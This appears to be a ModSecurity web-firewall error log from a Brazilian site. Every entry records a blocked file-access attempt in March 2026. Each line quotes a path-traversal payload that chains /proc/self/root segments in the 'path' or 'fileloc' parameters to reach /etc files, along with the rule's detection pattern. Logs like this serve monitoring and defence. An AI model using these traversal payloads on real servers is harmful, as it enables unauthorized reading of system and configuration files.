[Tue Mar 17 08:59:04.199554 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.241.46:42050] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCCJDEJR9VXonE_-1JmAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:06.324423 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.46:40596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCCQeiSKl8TjouI-b9uAAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:07.303414 2026] [:error] [pid 1016:tid 140411716749056] [client 74.7.243.203:54964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCC5qmL8PQht4WJFlC1QAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:59:07.591951 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.241.46:40598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCC9CmCSWTlPouqorG-QAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:08.595255 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.203:49512] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCDKBJNF7axNlVR0X4oQAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:59:09.772657 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:49516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCDe82sZHvlq4xgHq_EQAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:59:10.960467 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.241.46:51374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCDu82sZHvlq4xgHq_EwAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:13.255305 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.243.203:55450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCEZqmL8PQht4WJFlC3AAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:59:14.450000 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.241.46:51382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCEqBJNF7axNlVR0X4pQAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:16.983610 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.241.46:51390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCFBePVOt35XCGZP8rpQAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:18.333034 2026] [:error] [pid 7000:tid 140411666392832] [client 74.7.241.46:46724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCFhePVOt35XCGZP8rpwAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:45.991314 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.241.46:46736] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCMZDEJR9VXonE_-1JtQAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:48.488398 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.241.46:39052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCNJDEJR9VXonE_-1JvAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:59:53.368935 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:55462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCOe82sZHvlq4xgHq_OwAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:22.419073 2026] [:error] [pid 1961:tid 140411674785536] [client 74.7.241.46:42962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCVnRXaaWotPICgYsgrgAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:28.658184 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.243.203:53814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCXJDEJR9VXonE_-1J7gAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:00:32.855157 2026] [:error] [pid 11469:tid 140411649607424] [client 74.7.241.46:36560] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCYJDEJR9VXonE_-1J8gAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:34.136997 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.46:35376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCYqBJNF7axNlVR0X4ugAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:34.387562 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:38132] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCYqBJNF7axNlVR0X4uwAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:38.600247 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.241.46:35388] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCZpqmL8PQht4WJFlC9wAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:00:42.249560 2026] [:error] [pid 1210:tid 140411574073088] [client 74.7.241.46:46946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCalKJy4A1bGlmj9BRRgAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
